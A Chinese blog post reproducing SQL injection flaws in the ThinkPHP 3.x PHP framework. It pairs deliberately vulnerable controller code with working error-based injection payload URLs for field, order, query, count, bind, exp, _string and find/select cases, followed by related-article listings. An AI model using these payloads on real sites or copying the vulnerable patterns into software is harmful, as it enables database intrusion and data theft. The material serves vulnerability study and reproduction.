基于tp3的sql注入漏洞的复现

最新推荐文章于 2024-08-11 21:50:57 发布
最新推荐文章于 2024-08-11 21:50:57 发布
阅读量2.5k 收藏 2
点赞数
分类专栏: 漏洞利用 文章标签: 基于tp3的sql注入漏洞的复现
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/92164201
版权

开发失误情况下的产生的SQL注入

1.field注入

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function fieldsql(){
        $table_name = I('GET.id') ? I('GET.id') : 1;
        $test = M('users')->field($table_name)->select();
        var_dump($test);
    }
}

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20from%20users%20where%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))%20--%20a

这里有个局限性就是需要知道字段的名字才能进行注入 这次我字段的名字是username

所以大家进行注入的时候可以搭配日志进行注入 在日志里面有相关的表和字段提供给我们进行注入~

剩下的
order注入 跟上面的操作一样

payload: http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

comment注入 这里的注入我们需要先闭合前面的/*然后再进行注入再闭合后面的*/

payload : http://127.0.0.1/index.php/Home/Index/fieldsql?id=*/where%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a/*

group注入 注入的话 我们需要先用逗号进行分割 然后相同的操作进行注入

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

having注入

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

使用原生还不过滤的情况 query注入

    public function querysql(){
    	$id = I('GET.id') ? I('GET.id') : 1;
    	$test = M()->query('select * from users where id = ' . $id);
    	var_dump($test);
    	
    }

这个肯定都知道 M方法直接继承父类的操作 用query进行原生查询 拼接字符串 直接game over

payload:http://127.0.0.1/index.php/Home/Index/querysql?id=123%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

query和execute类似 都一样

统计查询外部可控制时造成的注入( Count,Max,Min,Avg,Sum )

    public function info(){
    	$test = I('test') ? I('test') : 1;
    	M('users') -> count($test);

    }

payload:http://127.0.0.1/index.php/Home/Index/info?test=1)%20from%20users%20where%20updatexml(1,concat(0x7e,(select%20user())),0)%20--%20a

其他的其实都差不多 只要开启了调试我们都可以根据其中的代码进行注入

即使使用了I函数也是不讲道理直接日穿型

实例代码

public function zxczxczxc(){
    $map['id'] = I('GET.id') ? I('GET.id') : 1;
    $data['username'] = 1;
    $c = M('users')->where($map)->save($data);
    var_dump($c);
}

payload:http://127.0.0.1/index.php/Home/Index/zxczxczxc?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

setField注入 跟上面差不多 就是用的是setField方法
payload:http://127.0.0.1/index.php/Home/Index/zxczxczxc?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

基本上使用了 exp的注入
实例代码:

public function test2(){
    $id = I('get.id');
    $map['id'] = array('exp',$id);
    $data = M('users')->where($map)->select();
    var_dump($data);
}

payload:http://127.0.0.1/index.php/Home/Index/test2?id=%3D1%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

实例代码

public function test5(){
    $map['id'] = $_GET['id'];
    $data = M('users')->where($map)->select();
    var_dump($data);

}

payload:http://127.0.0.1/index.php/Home/Index/test5?id[0]=exp&id[1]=%20In%20(2)%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

使用组合查询时的注入方式1 _string注入

实例代码:

    public function sqltetete(){
        $map['id'] = 2;
        $map['_string'] = I('get.test');
        M('users')->where($map)->select();
        
    }

payload:http://127.0.0.1/index.php/Home/Index/sqltetete?test=updatexml(1,concat(0x7e,(select%20user())),0)

0day thinkphp3.2 find/select/delete注入
实例代码

    public function asdasd(){
        $data = M('users')->find(I('get.test'));
        var_dump($data);

    }

payload:http://127.0.0.1/index.php/Home/Index/asdasd?test[where]=updatexml(1,concat(0x7e,(select%20user())),0)

来源:https://xz.aliyun.com/t/2630#toc-23

小鱼儿waha
关注
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1742
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704)
qq_51577576的博客
02-16 1481
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
tp3.2.3sql注入漏洞分析
qq_53856457的博客
05-18 1999
thinkphp3.2.3 sql注入漏洞分析 文章目录thinkphp3.2.3 sql注入漏洞分析thinkphp3.2.3 where注入环境配置数据库配置控制器payload:过程分析ThinkPHP3.2.3_bind注入1. 环境2. payload3. 过程分析thinkphp 3.2.3 exp注入1.环境2.payload:3. 过程分析**补充:**1.为什么I()方法能阻止sql注入?2.parseWhereItem方法设计缺陷3.漏洞代码中的where方法为什么要是数组的形式 先到t
PHP代码审计之再探 TP3 漏洞
Love&Share
01-13 1619
之前写过关于 TP 漏洞的文章,只是时间久远,记忆不是很深刻,这次来复习温故知新 文章目录TP 3.2 信息泄露配置环境日志信息泄露缓存泄露指纹识别TP 3.2错误写法导致SQL注入exp 表达式TP 3.2 update\bind注入TP 3.2 find注入 TP 3.2 信息泄露 配置环境 数据库连接配置 # application/home/controller/IndexController.class <?php namespace Home\Controller; use Think.
sql注入-常见注入方法复现
dragon的博客
08-06 925
报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查。
tp中如何防止mysql注入_thinkphp如何防止sql注入xss攻击
weixin_42327688的博客
01-19 1718
SQL注入简介SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一...
tp3.2web项目开发过程出现的问题
youhong_的博客
07-31 275
查找最小值的方法,由于min()函数与where会优先调用min()函数,where失效 $mins=$user-&gt;where('status&gt;0')-&gt;order('id asc')-&gt;limit(0,1)-&gt;find();  获取当前时间前n天的方法,strtotime()中引入变量,路径中引入变量 $day=date("Y-m-d",strto...
任意文件上传漏洞(技术栈php+TP3.2)
weixin_44783781的博客
12-18 1217
一、漏洞描述 文件上传漏洞通常由于网站对用户上传的文件未经过校验或者校验不严,导致用 户可以上传任意格式、内容的文件,并可以访问到该文件。恶意攻击者可以利用 这个漏洞,上传可以被服务端解析的木马病毒,导致服务器的权限被恶意攻击者 获取。对网站造成极大的危害。 二、问题 3、解决过程 原先的代码如下:(主要是以后缀名来断定文件类型的) public function uploadResume() { $config = array( 'maxSize
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8858
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现 在ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
weixin_51387754的博客
12-30 4916
漏洞简介 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 模块:thinkphp 所有的主入口文件默认访问index控制器   方法:thinkphp 所有的控制器默认执行index动作   构造:http://IP/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值…] 原理:控制了i
用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
0xSec
01-30 533
用友GRP-U8R10行政事业内控管理软件forgetPassword_old.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6701
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
.exp文件_thinkphp 3.2.3 exp注入漏洞分析
weixin_39798626的博客
11-25 300
1.EXP注入漏洞分析:在官网下载thinkphp3.2.3然后在ThinkPHPConfconvention.php配置好MySQL帐号密码再添加一行,用来打印sql语句'SHOW_PAGE_TRACE' =>true,ApplicationHomeControllerIndexController.class.php漏洞代码public exphttp://127.0.0.1/index...
thinkphp漏洞之sql漏洞
最新发布
banliyaoguai的博客
08-11 604
上面下载相应版本(下图中展示的5.0.15版本),下载think文件,下载framework文件,然后将framework文件修改名字为thinkphp,然后将修改后的framework放在think文件下,然后将think放在网站目录下,然后就可以打开了。parseArrayData拼接的值,这里是将你的注入语句用^与后面的('0(1)')进行拼接,或者使用|拼接也可以,这样的目的是为了mysql语法正确,这里对于后面的语句来说不重要,因为走到update的时候已经报错了。然后就会执行,报错出现注入。
php防止xss攻击和sql注入
dw5235的博客
04-08 1252
1、防止xss攻击 1、开启COOKIE_HTTPONLY = true ;//tp3.2 2、default_filter:设置为htmlspecialchars 百度官方方法: 和SQL注入防御一样,XSS攻击也是利用了Web页面的编写疏忽,所以还有一种方法就是从Web应用开发的角度来避免: 步骤1、对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、P...
常见的方法:防止PHP中的SQL注入
五六碗瓶
12-23 941
2.对用户输入进行过滤和验证:在执行SQL查询之前,对用户提供的输入进行严格的验证和过滤。1.使用预处理语句:使用PDO(PHP Data Objects)或MySQLi等库,可以使用绑定参数或占位符的方式处理SQL查询。3.限制数据库用户权限:为数据库用户分配最小的权限,确保他们只能执行必需的操作,并限制他们对敏感数据的访问。4.避免动态拼接SQL语句:避免直接将用户提供的数据拼接到SQL查询中。5.更新PHP和数据库版本:始终使用最新版本的PHP和数据库软件,以便获得最新的安全补丁和更新。
116 thinkphp 3.1 sql注入
fancivez的专栏
12-12 2809
http://www.wooyun.org/bugs/wooyun-2010-086737 简要描述: ThinkPHP框架本身缺陷导致SQL注入漏洞,基本影响所有使用ThinkPHP开发的应用,包括thinksns、onethink等,这里以thinkphp自家的OneThink为例。 这个猛料,希望能加精呀~ 详细说明: 很多人天真的以为,使用了框架提供的数据
thinkPHP3.2.3中sql注入漏洞
XINO
05-26 1997
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值